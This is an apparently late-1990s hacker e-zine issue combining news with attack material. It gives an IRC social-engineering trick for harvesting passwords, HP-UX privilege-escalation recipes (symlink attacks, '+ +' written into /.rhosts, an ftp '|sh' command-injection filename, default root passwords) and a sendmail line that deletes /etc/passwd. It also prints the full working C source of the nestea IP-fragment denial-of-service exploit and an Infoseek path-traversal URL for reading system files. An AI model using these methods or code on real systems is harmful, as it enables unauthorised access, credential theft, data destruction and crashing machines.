===========================================================================
*-* L e g i o n s *-*
o f
t h e
U n d e r g r o u n d
h t t p : w w w . l e g i o n s . o r g
(K e e n_V e r a c i t y)
*-* *-*
===========================================================================
C o n t e n t: /Z1#P10.01/
o-NEWS-o
*About | |- optiklenz
*------------------------ | |-
*------------------------ | |-
*Beach Con - | |- sync
*------------------------ | |-
*Phreak Zine | |- optiklenz
*------------------------ | |-
*This Months Linkage - | |- LegionPhreak
*------------------------ | |-
o-IRC-o
*Irc Social Engineering |*revisited|- optiklenz
*------------------------ | |-
*Legions Script - | BitchX |- HyperLogik
*------------------------ | |-
o-Neophytes-o
*Basic Unix Commands - | |- optiklenz
*------------------------ | |-
*Exploits? | |- miah
*------------------------ | |-
o-Security-o
*HPUX Security Overview | revised |- tip
*------------------------ | |-
*HPUX Exploits Note | bugs |- optiklenz
*------------------------ | |-
*Nesta Exploit | advisory |- dallion
*------------------------ | |-
*Infoseek | exploit |- optiklenz
*------------------------ | |-
*Fake Mail | revised |- optiklenz
*------------------------ | |-
*Wingate Exertion | |- optiklenz
*------------------------ | |-
*backdoor.c | |- jsbach
*------------------------ | |-
*Ip Spoofing | |- optiklenz
*------------------------ | |-
*Anal Sniff | |- chronic
*------------------------ | |-
*Back Attack | |- chrak
*------------------------ | |-
*Irix LMR | |- optiklenz
*------------------------ | |-
*Securing Linux | |- BlackIC
*------------------------ | |-
*FoolProof | |- Duncan Silver
*------------------------ | |-
o-Misc-o
*pnp56K Linux Setup | |- mosoka
*------------------------ | |-
*Sniffer Log | |- chrak
*------------------------ | |-
o-Comic Relief-o
*------------------------ | |-
*Young Hackers, and Jail | |- Ana1yzer
*------------------------ | |-
__________________________________________________________________
- { = - = N E W S = - = } -
[ABOUT]-------------------------------------| optiklenz |
This zine covers different aspects of
computing. This months security focus is
concentrated on the hpux platform. This
month's guest editor is Analyzer. Guest
editors along with the topic the editor
is writing on will change monthly.
Most of our articles, and zines for the
past 6 years have been distributed through
bulletin board services. Our own Electronic
Source, and Abyss BBS just to name a couple.
This is actually our first zine release being
distro'd via the web. We release a new zine every
month. If you would like to submit an article for
the next zine send email to webmaster@legions.org
with the subject matter of the article. Also if
there is a cetain subject you'd like to see written
about in the next zine please let us know.
(1)------------NEWS-------------------------------------(1)
[Beach Con]-------------------------------------| sync |
Last year's Legion Con's (cyber con)
theme was network utilization this year
there will be a multiude of themes
which range from main stream security,
cryptology, to telephony, and other
types of electronic manipulation.
(2------------NEWS-------------------------------------(2)
[Phreak Zine]-------------------------------------| optiklenz |
We are currently working on our
Phreak zine. There is progess, but
production is going extremely slow
being that members are currently
occupied with their own activitys.
An example of some of the zines content
is listed below.
[o] Shadowing your ANI
[o] Detailing, and using a beige box..
[o] ATT-CONF
[o] Phone Tapping
[o] Discreet frequencies
[o] Telenet #'s
[o] More...
Wan't to submit an article? Mail
webmaster@leigons.org with the article
title first. We will either "ok" it or
decline it depending on your article
content or if someone has already choosen
the same subject matter.
(3)------------NEWS-------------------------------------(3)
[Linkage]-------------------------------------| LegionPhreak |
This Months Linkage:
They Finally have a static layout A UDDF.NET production (www.uddf.net)
http://www.hackers.com http://www.hackedsites.com
Exploits Galore Beat your Meat (It's good for you)
http://www.rootshell.com http://www.freshmeat.net
Rhino9 Unix Guru
http://www.rhino9.com http://www.ugu.com/
Link of the month: www.legions.org
(4)------------NEWS-------------------------------------(4)
- { = - = I R C = - = } -
[Social Engineering]-------------------------------------| optiklenz |
Gaining Users passwords via irc Method1.
First you need to open 2 irc clients open.
This method is more authenic if you
have operator status in the channel.
On one of the open clients name yourself
Bot, or something to that effect, and on
the other client user your regular nick.
If someone is looking to get op's let them
know that there is a Bot in the channel, and
if the user/users wan't ops they must first
identify themselves with the Bot using the
/msg Bot identify password command. After you
tell them this and leave the room either
way the passwd's will come rolling in. It's
less suspicious if you leave though because
people will think damage can't be done if
your not there to do it on the antithesis
you are still there because you are the Bot
just sitting there collecting passwd's these
passwd's maybe for their email account, website,
and other things. So go back later and ask the
people that fell for it if they have a website,
or for their email address, etc, etc
(5)------------IRC--------------------------------------(5)
[Legions Script]-------------------------------------| Hyperlogik |
Legions script for linux is due out in a few weeks.
more info will be posted in the next zine.
(6)------------IRC--------------------------------------(6)
- { = - = N E O P H Y T E S = - = } -
Note: The content of the neophytes section will grow more
indepth every month. Escalating from basic to median,
and so on...
[Basic Unix Commands]-------------------------------------| optiklenz |
who is on shows who is logged on the system
write name name equiv to the person you want
to chat with (ctrl D exits Chat mode
EOT End of Transfer
du -a mem check
ps -pid user kills a user
passwd Change your users passwd
ls List all files in a directory (ls-a)
telnet start a telnet session
open open a location
ftp start file transfer session
find Find a file
cd\dir dir being sub-directory
netstat See current processes running among
your connection.
chgrp Changes a file's group ownership
cat "file" type contents try cat /etc/passwd
tcpdump Packet sniffer, moniter packets
in promniscious mode
rmdir Deletes one or more directories
sleep Causes a process to become inactive
for a specified
amount of time
sort Sort and merge one or more files
spell Finds spelling errors in a file
split Divides a file
stty Displays or set terminal parameters
tail Displays the end of a file
troff Outputs formatted output to a typesetter
tset Sets other terminal type
unmask Allows the user to specify a new creation
mask
uucp Unix-to-Unix copy
vi Full screen editor
wc Displays details in the file size
who Displays information on the system users
write Used to send a message to another user
ifconfig To see the routing layout/destination
of packets etc
gcc Compile C based code
rm delete file
mv rename
bfs Scans a large file
cal Displays a calendar
mkdir Create a directory
chmod Assign File permissions
TIP: If you have temp access
to a systen chmod 777 $home
or chmod $email so you have
access to their home directory,
as well as their email later.
(7)------------NEOPHYTES--------------------------------------(7)
[Exploits]-------------------------------------| miah |
Alot of people ask me about exploits, what they are, what they do, and how
they use them. Well, I'm writing this document to explain this for hopefully
my last time. It's just starting to bother me that I have to explain this
everytime I'm on irc, so i thought there should be a text explaining them.
Well, here it is.
--- What is a ' Exploit ' ? ---
Well to explain this simply, a Exploit is a program that 'exploits' a bug
in a specific software. All exploits are different, they do different things
exploit different bugs, thats why exploits are allways program specific.
Exploits are made to get root on different operating systems. They achive
this by exploiting a bug in software when the software is running as root.
In UNIX type OS's, software may have to run as root ( or UID 0 ) in order to
perform a specific task that cannot be performed as another user. So basically
the exploit crashes the software while running as root to give you the beautiful
root prompt.
Well, now that I've answered questions one and two, I'm going to move on to
question 3.
--- How do I use a exploit? ---
Since exploits are coded in C 99% of the time, you need a shell on the box
you are going to use the exploit on, OR, you need to be running the same OS as
the box you are attempting to hack. So basically, you need to put the source
code, or the binary in your shell accounts dir, ( you want to use a hacked, or
a shell not yours for this :) ) to put it on your shell, you can ftp to your
account and upload it that way, or you can use rz if you are using a dialup shell.
either way, i shouldnt have to explain those to things to much, its pretty easy.
Once you have the exploit on the box you just need to compile it. Usually you
would compile the exploit like so;
blah:~/$gcc exploit.c
that should compile your exploit. However, be aware that some exploit coders
are sneaky pests, and like to pick on people who dont know C, so they will
sometimes insert bugs into the exploit, thus uninabiling it to be compiled. So
it does help to know C, when playing with C :)
After the compiling is done, you should beable to just run the exploit and its
work will be done when you see the root prompt. however, not all exploits are
the same, and might require different commandlines to get them to work.
--- Where can I get some exploits? ---
Well 2 of the best places i have found for exploits are
http://get.your.exploits.com and http://www.rootshell.com
(8)------------NEOPHYTES--------------------------------------(8)
- { = - = S E C U R I T Y= - = } -
[Hpux Security Overview]-------------------------------------| tip |
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
HP-UX: A Security Overview, Part One revision02 17mar98
http://www.legions.org
---------------------------------------------------------------------------
Table of Contents:
1) Intro and Disclaimer 5) The Trusted System
2) HP-UX: an Overview 6) Resources
3) The Setup by Default 7) Exploits
4) HP-UX Security Measures 8) To Be Continued
---------------------------------------------------------------------------
1) Intro and Disclaimer
a) This text is designed to complement to general Unix knowledge. All Unix
OS's are different in their own right. This text will delve into HP-UX-
specific areas. This is not a Unix tutorial, rather a supplement to
fundamental Unix hacking knowledge.
b) This text will cover HP-UX version 10.x primarily. Specifically, 10.10
and 10.20 will be in mind. 11.0 has been released and I haven't gotten
to checking it out yet. 9.x is old, and no longer supported by HP. Thus,
the most logical choice (and most popular version of HP-UX) is 10.x.
c) I'm not perfect; please notify me of any errors in the document. Also,
if you see anything you want added to this file, feel free to send them
to me.
d) This text was written for educational purposes only.
e) Thanks to HP, rootshell, and the various other hacker folks that have
helped me write this article. Special thanks to Colonel Panic for find-
ing many exploits, some of which I have used as examples. Shouts out to
my fellow LoU members, the SOD, and the Chicago crew.
---------------------------------------------------------------------------
2) HP-UX: an Overview
Largely based on SysV, Hewlett Packard's version of Unix, HP-UX, has un-
dergone many changes and many version updates (current version is 11.0).
While robust in many areas (ie, memory management, overall performance,
etc), security leaves much to be desired. HP's vision of Unix seems to
come from that of a closed network with non-malicious users (ie, /usr/local
being world-writeable); only recently has the Internet been an explosion,
and HP seems to be playing "catch up" to network and internal security.
HP's solution to security problems have been patches. Lots of patches. You
can see the patches on a system by typing "swlist -l product" (substitute
"fileset" instead of "product" for more specific information. Patch and
software information is stored in /var/adm/sw; so you can check out older
pre-patched binaries there. As usual, system logs are kept in /var/adm
(along with btmp, utmp, and wtmp).
---------------------------------------------------------------------------
3) The Setup by Default
By default, HP-UX is VERY insecure. Yes, most Unixes are (by default),
but HP-UX even more so. Here is a brief following of what is insecure by
default:
o /usr/local and subdirectories are world writeable.
o Many applications by default are installed as world writeable (ie,
measureware database module for oracle installs this way.
o root's umask is set to: 02.
o cue is installed (see section 6 for the exploit).
o System is un-"Trusted." See section 4.
o Direct login as root possible from all ttys (as result of being un-
"Trusted").
o System logging is set pretty minimal (see /etc/syslog.conf); not that it
matters, as system logging is pretty minimal no matter how you have it.
o /etc/logingroup non-existent. While this is not an insecurity, it's worth
mentioning.
---------------------------------------------------------------------------
4) HP-UX Security Measures
o Suid scripts not possible
This is a popular trend in newer Unix OS's. Basically, if you have a
suid script, it will not be run as root. Binaries are what's important.
o Dialup passwords
You can set an additional password for a dialin device. If you dialed
into an HP-UX server with dialup passwords enabled, you would enter your
usual login and password, then an _additional_ dialup password. Each
dialup password is dependant of the shell; the shell is used as the "login"
field. To explain further, look at /etc/d_passwd:
/bin/sh:qKrbuYLg9B2vU:0:0:::
/bin/csh:4LcBNqYbmdp3Y:0:0:::
/bin/ksh:zKanqUcdEzh3Q:0:0:::
What's important here are the first two fields (obviously). Two other
things to note; Firstly, if the system is relatively secure, the "login"
field can only be eight characters long. This creates a problem if your
shell is "/usr/local/bin/tcsh" (19 chars). Thus, what's done is either: a
link is created that is less than eight characters (ie, /bin/tsh -> /usr
/local/bin/tcsh) or dialup passwords just aren't used. Secondly, the file
to reference which tty the dialin is located is /etc/dialups:
/dev/ttyd0p7
That's it. That's the format of the file.
o lanscan and ioscan
Just a side note to the standard commands, ifconfig and netstat.
lanscan will tell you what interface cards you have on the system, which
are up or down, etc, etc. ioscan is similar, but covers the entire system,
ie, hard drives, I/O adapters, memory, etc. Might be useful in getting more
intimate with your system.
---------------------------------------------------------------------------
5) The Trusted System
What is a "Trusted System"? Check for a /tcb directory. The existence of
a /tcb directory signifies that the system you're on is a "Trusted System."
The conversion to this is done through /usr/sbin/sam by root. Here is what
converting does to a system:
o Pseudo-shadow password scheme (actually uses a "protected password
database").
o A stricter password authentication system.
o User auditing.
o Access control lists (acls) [note: only supported under hfs, not vxfs]
[second note: being phased out].
o Terminal and time-based access control.
Basically to put this all together, in the /tcb/files/auth directory,
there are a number of subdirectories by capital and lowercase letters, ie,
"e," "T," and so forth. This is the initial of the login. In that directory
is a file per user. Thus, root's file would be /tcb/files/auth/r/root.
What's in this file? It's basically like a password entry, with more
fields. ie, /tcb/files/auth/r/root:
root:u_name=root:u_id#0:\
:u_pwd=Z1Po84UVyBbGE:\
:u_bootauth:u_auditid#0:\
:u_auditflag#1:\
:u_pswduser=root:u_suclog#8895646615:u_lock@:chkent
root's entry in /etc/passwd would then be:
root:*:0:3:root:/:/sbin
If it isn't obvious, the login and user id of an /etc/passwd are there,
along with additional information. The above example has only a few fields
listed.
The full contents of an HP-UX password database file would contain:
a login and user id b encrypted password
c account owner d single user mode boot flag
e audit id and audit flag f minimum time between password change
(not in example - u_minchg)
g password max length h password expiration time
(not in example - u_maxlen) (not in example - u_exp)
i password lifetime j time of last password change
(not in example - u_life) (not in example - u_usucchg &
u_unsucchg)
k absolute password expiration date l max time allowed between logins
(not in example - u_acct_expire) (not in example - u_max_llogin)
m max days before expiration when before acct is locked
warning will appear n user or system generated password?
(not in example - u_pw_expire_ (not in example - u_pickpw)
warning)
o type of sys-ten passwords p triviality check on user-gen
(not in example - u_genpwd) (not in example - u_restrict)
q can pick null password? r userid of last person who changed
(not in example - u_nullpw) this password (not in example -
u_pwchanger)
s random # that user must supply t can user generate random # for a
(given to him by the admin) when password? (not in example -
password is reset (not in example u_genchars)
- u_pwd_admin_num)
u can user generate random letters v time of day when user can login
for a password? (not in example (not in example - u_tod)
- u_genletters)
w time of last successful login x time of last unsuccessful login
(not in example - u_suclog) (not in example - u_unsuclog)
y term or remote hosts from last z number of unsuccessful logins, this
successful and unsuccessful logins # clears upon a successful login
(not in example - u_suctty & (not in example - u_numunsuclog)
u_unsuctty)
1 max number of login attempts 2 account locked flag (not in example
before account is locked - u_lock)
(not in example - u_maxtries)
In /tcb/files, in addition to auth, there are two files, devassign and
ttys. devassign contains device access info and ttys contains term access
info.
Here are a few lines from devassign:
console:v_devs=/dev/console:v_type=terminal:chkent:
ttyp0:v_devs=/dev/ttyp0:v_type=terminal:chkent:
ttyp1:v_devs=/dev/ttyp1:v_type=terminal:chkent:
The format of this file contains:
a device name b aliases to that device
c device supported (ie, printer, d users permitted on that device, if
terminal, tape, or remote) not specified, all users may use it
Here are a few lines from ttys:
console:t_devname=console:t_maxtries#777:chkent:
tty:t_devname=tty:chkent:
tty00:t_devname=tty00:chkent:
The above example only has a few fields listed. The full format of this
file contains:
a device name b last user (id) to log into that tty
(not in example - t_uid)
c last successful login time d last unsuccessful login time
(not in example - t_logtime) (not in example - t_unsuctime)
e number of consecutive logins f terminal lock flag
before tty is locked
In all actuality, not many HP-UX systems are setup to be Trusted.
Managing a password database and tweaking is more work than neccessary.
In addition, remote commands are not possible on a Trusted System, unless
it is done _from_ a Trusted System. Lastly, mapping files to sync /etc
/passwd with /tcb/files/auth are contained in /tcb/files/auth/system.
These are called pw_id_map, gr_id_map, and aid_id_map. It is very likely
that these mapping files will get out of sync with the database files. The
solution is removing them and letting them regenerate. However, all in all,
having a Trusted System can prove to take as much maintanence as an un-
Trusted System. It's really the admin's call. I've seen maybe about half
and half these days.
---------------------------------------------------------------------------
6) Resources
o If you have a question about a patch, check out ftp://us-support.
external.hp.com. All the current patches are available there for your
peruseal.
o http://www.rootshell.com, http://get.your.exploits.org, http://www.hha.
net/hha/exploits, http://www.dhp.com/~fyodor/sploits_hpux.html: Very good
sites with Unix and HP-UX-specific exploits. Both explanations and source
code/scripts are available here.
o Usenet: comp.os.security.announce and comp.sys.hp.hpux: Sometimes
regular updates of weaknesses. Avoid alt.2600 at all costs.
o And of course, the ever-so-handy man command.
---------------------------------------------------------------------------
7) Exploits
These are only a few of many. I only added a few, as I wanted to explain
about HP-UX security in general. Part 2 will delve deeper into exploits
(as well as auditing, system calls, and acls).
o cue bug
The first thing after gaining access to an HP-UX system is to check if
cue exists (typically in /usr/bin/cue). Make sure it's an suid binary
(which it is by default). Simply set your umask to 000. Now start cue. In
your home directory, do an ll. You'll see that the name of the file created
by cue (in my case, it's called "IDMERROR.ttyp1") is owned by root. You'll
also see that the umask follows and is world-writeable. Now exit cue.
Remove the *ERROR* file created by cue. Think of a file like /etc/passwd or
/.rhosts. Do an "ln -s /etc/passwd ~/IDMERROR.ttyp1" (or whatever suits
your needs). Now start cue again. Exit it. You'll see that the root owned
file that wasn't writeable by anyone not only is now truncated, but it has
world write permission. Do whatever you want with it.
o ftp mget bug
This won't do you much good if ftp isn't suid root (most likely it
won't be), but this still works (not as root though). In /tmp, create a
separate directory (we'll use "test"). cd to that directory and execute
this command: echo "date > /tmp/BLAH" > "|sh". Notice that /tmp/BLAH does
not exist. Now, ftp to localhost. cd to /tmp/test and do a "mget *".
ftp that file. Now quit ftp and check for a /tmp/BLAH. It exists! cat it.
Now what if ftp was suid root, and the echo command you used to create
"|sh" was this: echo "chmod 777 /etc/passwd" > "|sh"?
o Old SAM bug
Typically, when SAM (System Administration Manager) is being run by
an admin, a temp file is created in /var/tmp. Newer, patched SAMs use
arbitrary file names, ie OBAMDBAa01687 or aaaa01990, etc. But older SAMs
used a consistent file name when writing this temp file. It was called:
outdata. Since SAM is typically run as root, you'll see what I'm getting
at here (duh, the temp file is owned by root). Simply create a link to a
file, such as /etc/passwd to that temp file (ie, ln -s /etc/passwd /var
/tmp/outdata). Now if root's umask is set to 000, then you'll own /etc
/passwd next time the admin runs SAM. This trick is unlikely these days,
as most SAMs are patched and most admins don't use umask 000 on root.
o Old SAM bug 2
On older versions of SAM, a user named sam_exec was created with uid 0.
The default password for this on 10.x is: x7vpa5jh
Simply login as sam_exec, and hit control-c right away for a shell.
o ppl bug
Another symbolic link exploit. ppl's log file is: /var/ppl/log. Now,
you can simply remove or move this (so that /var/ppl/log is non-existent;
also /var/ppl is world-writeable on default, thus you can do this). This
log file is owned by root (ppl is an suid program). Next, think of a file
that you'd like to nuke and own (if you don't want to get caught, try
/.rhosts instead of something like /etc/passwd; in addition, save the old
/var/ppl/log somewhere to put back when you're done). Now do a: ln -s
/.rhosts /var/ppl/log. Then type:
ppl -o '\
+ +
'
or whatever you want to place in /.rhosts. You get the drift. Now you can
remove /var/ppl/log and put the old one back in place. You can now rlogin
as root.
o Educational Centers
HP's educational centers are protected mainly by firewalls. But if you
happen to get in, the root password on nearly all machines is simply: hp.
---------------------------------------------------------------------------
8) To Be Continued
Part Two will delve deeper into the Trusted System, specifically cover-
ing auditing and acls. Exploits will also be covered in greater detail.
---------------------------------------------------------------------------
(c) 1998 tip of Legions of the Underground http://www.legions.org
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
(10)------------SECURITY--------------------------------------(10)
[Hpux Exploits Note]-------------------------------------| optiklenz |
HP_UX versions 1.2&13.1 sm, -oQ ==> can read/write any file
5.57 from:<"|/bin/rm /etc/passwd"> && bounce mail....
HPUX <7.0 1-- chfn -- allows newlines, etc ()
HP-UX 1-- sendmail: mail directly to programs ()
HPUX A.09.01 1-- sendmail: mail directly to programs ()
1) libXt: this is a widely known security hole that allows local users
to gain root access via setuid X programs like xterm or xload. A
recommendation is to replace the guilty libraries by applying X/Motif
"jumbo" patches, which is a good thing anyway.
2) sendmail: yet another sendmail hole. The best solution at CERN is
maybe to use the public domain version of sendmail (used by default on
all HP-UX 10.20 systems) that does not seem vulnerable.
(10)------------SECURITY--------------------------------------(10)
[Nesta Exploit]-------------------------------------| Dallion |
---------------------------------------------------------
Note: Nestea by humble\nCode ripped from teardrop by route
---------------------------------------------------------
Bascially crashes a machine using "off by one" ip headers. Like boink and
land reversed. Its a total rip (the code that is) but it works, non the
less. I have tested it on machines running kernel 2.0.33 and 2.1.95 both
machines went slamming down when I hit them, I like this toy :) To fix it:
1) if you do packet filtering set it to filter off by one ip headers
2) fix your kernel to not process these packets.
-Dallion Dalson
Here is the exploit:
_
01. nestea.c - exploits the "off by one ip header" bug in Linux
//
// nestea.c by humble of rhino9 4/16/98
// This exploits the "off by one ip header" bug in the linux ip frag code.
// Crashes linux 2.0.* and 2.1.* and some windows boxes
// this code is a total rip of teardrop - it's messy
// hi sygma
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
// bsd usage is currently broken because of socket options on the third sendto
#ifdef STRANGE_BSD_BYTE_ORDERING_THING
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi <
3.0 */
#define FIX(n) (n)
#else /* OpenBSD 2.1, all Linux */
#define FIX(n) htons(n)
#endif /* STRANGE_BSD_BYTE_ORDERING_THING */
#define IP_MF 0x2000 /* More IP fragment en route */
#define IPH 0x14 /* IP header size */
#define UDPH 0x8 /* UDP header size */
#define MAGIC2 108
#define PADDING 256 /* datagram frame padding for first packet */
#define COUNT 500 /* we are overwriting a small number of bytes we
shouldnt have access to in the kernel.
to be safe, we should hit them till they die :> */
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);
int main(int argc, char **argv)
{
int one = 1, count = 0, i, rip_sock;
u_long src_ip = 0, dst_ip = 0;
u_short src_prt = 0, dst_prt = 0;
struct in_addr addr;
if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror("raw socket");
exit(1);
}
if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one,
sizeof(one))
< 0)
{
perror("IP_HDRINCL");
exit(1);
}
if (argc < 3) usage(argv[0]);
if (!(src_ip = name_resolve(argv[1])) || !(dst_ip =
name_resolve(argv[2])))
{
fprintf(stderr, "What the hell kind of IP address is that?\n");
exit(1);
}
while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
{
switch (i)
{
case 's': /* source port (should be emphemeral) */
src_prt = (u_short)atoi(optarg);
break;
case 't': /* dest port (DNS, anyone?) */
dst_prt = (u_short)atoi(optarg);
break;
case 'n': /* number to send */
count = atoi(optarg);
break;
default :
usage(argv[0]);
break; /* NOTREACHED */
}
}
srandom((unsigned)(time((time_t)0)));
if (!src_prt) src_prt = (random() % 0xffff);
if (!dst_prt) dst_prt = (random() % 0xffff);
if (!count) count = COUNT;
fprintf(stderr, "Nestea by humble\nCode ripped from teardrop by route /
daemon9\n");
fprintf(stderr, "Death on flaxen wings (yet again):\n");
addr.s_addr = src_ip;
fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
addr.s_addr = dst_ip;
fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
fprintf(stderr, " Amt: %5d\n", count);
fprintf(stderr, "[ ");
for (i = 0; i < count; i++)
{
send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
fprintf(stderr, "b00m ");
usleep(500);
}
fprintf(stderr, "]\n");
return (0);
}
void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
u_short dst_prt)
{
int i;
u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */
u_char byte; /* a byte */
struct sockaddr_in sin; /* socket protocol structure */
sin.sin_family = AF_INET;
sin.sin_port = src_prt;
sin.sin_addr.s_addr = dst_ip;
packet = (u_char *)malloc(IPH + UDPH + PADDING+40);
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
byte = 0x45; /* IP version and header length */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + 10); /* total length */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
p_ptr += 2;
*((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kernel */
*((u_long *)p_ptr) = src_ip; /* IP source address */
p_ptr += 4;
*((u_long *)p_ptr) = dst_ip; /* IP destination address */
p_ptr += 4;
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + 10); /* UDP total length */
if (sendto(sock, packet, IPH + UDPH + 10, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
byte = 0x45; /* IP version and header length */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + MAGIC2); /* total length */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
p_ptr += 2;
*((u_short *)p_ptr) = FIX(6); /* IP frag flags and offset */
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kernel */
*((u_long *)p_ptr) = src_ip; /* IP source address */
p_ptr += 4;
*((u_long *)p_ptr) = dst_ip; /* IP destination address */
p_ptr += 4;
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + MAGIC2); /* UDP total length */
if (sendto(sock, packet, IPH + UDPH + MAGIC2, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING+40);
byte = 0x4F; /* IP version and header length */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING+40); /* total length */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
p_ptr += 2;
*((u_short *)p_ptr) = 0 | FIX(IP_MF); /* IP frag flags and offset */
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kernel */
*((u_long *)p_ptr) = src_ip; /* IP source address */
p_ptr += 4;
*((u_long *)p_ptr) = dst_ip; /* IP destination address */
p_ptr += 44;
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */
for(i=0;i<PADDING;i++)
{
p_ptr[i++]=random()%255;
}
if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
free(packet);
}
u_long name_resolve(u_char *host_name)
{
struct in_addr addr;
struct hostent *host_ent;
if ((addr.s_addr = inet_addr(host_name)) == -1)
{
if (!(host_ent = gethostbyname(host_name))) return (0);
bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
}
return (addr.s_addr);
}
void usage(u_char *name)
{
fprintf(stderr,
"%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many
]\n",
name);
exit(0);
}
(11)------------SECURITY--------------------------------------(11)
[Infoseek]-------------------------------------| optiklenz |
http://www.infoseek.com/cgi/bin?/./view?/home/path
alternate bin with etc (etc, etc), and you will
receive /etc/ directory structure which contains
the passwd file.
The above exploits a discreet flaw in infoseeks cgi. It can be used
to view various binary, and commands. If you are viewing
it using a netscape browser keep reloading the document output
will change the binary data. If you are using lynx you should receive
command binary, and a directory structure.....
/bin/
For Example:
imeOasetunameOäsleepOåstrchgOæstrconfOçsttyOèsuOétabsOêtailOëtalkOìtee
OítelnetOîtftpOïticOþtimeOñtipOòtplotOótputOôtrOotrueOöttyO÷unameOøupt
imeOùvacationOúvmstatOûwcOüwhichOywhoOþwhoisOwriteOxargsOxstrONbgONcd
ONcommandO[dispgidOddispuidOzexONfcONfgONgetoptsONhashOi386Oi486Oi860O
i86pcOiAPX286ONjobsONkillOhlnOm68kOmc68000Omc68010Omc68020Omc68030Omc6
8040OhmvOþpageOpdp11ONreadOyredO¥rkshOshOsparcOsunOsun2Osun3Osun3xOsun
4Osun4cOsun4dOsun4eOsun4mONtestOâtouchONtypeOu370Ou3bOu3b15Ou3b2Ou3b5O
NulimitONumaskONunaliasOvaxOzveditOzviOzviewOøwONwaitOAyppasswdOdmesgO
pcatOstraceOasaOawkObannerObatchO bcO bdiffObfsOcalO
calendarOcolOcommOcompressOcsplitOdcOdiffOdiff3OdircmpOdos2unixOexpand
OfactorOgraphOlastOlastcommOlognameOlookOmkfifoOnawkO OfactorOgraphOlas
OlastcommOlognameOlookOmkfifoOnawkO
newformO!newsO"nlO#packO$pasteO%rupO&rusersO'sdiffO(sortO)spellO*splin
eO+splitO,sumO-tcopyO.unexpandO/uniqO0unitsO1unix2dosO2unpackO3uudecod
eO4uuencodeO5vsigOoawkO uncompressOzcatO6volcheckO7audioconvertO8
admintoolO;showrevOchrtblO?colltblO@gencatOAgettxtOBkbdcompOClocaleODm
kmsgsOEmontblOFmsgfmtOGprintfOHsrchtxtOIxgettextO>wchrtblOJaddbibOKapr
oposOLcheckeqOMchecknrONdapsOOderoffOPdiffmkOQeqnORindxbibOSlookbibOTn
eqnOUnroffOVreferOWroffbibOXsoelimOYsortbibOZtaO[tblO\troffO]ulO^vgrin
dOKcatmanOKmanOKwhatisO_sagO`sarOaacctcomObtimexOcctOdcuOeuucpOfuuglis
http://www.infoseek.com/cgi/etc?/./read_./log/view?/home/passwd
in lynx will list the
directory structure for the etc directory
i;e /etc/
resolv.conf .. passwd
notrouterHlogin.accessshellsIhosts.equivS defaultrouterTskeykeys"
hostname.hme1 oshadowstmpP8opasswd(rdista005nY
publickey;chrootmvdir?pwck@termcapAunlinkBrmmount.confC
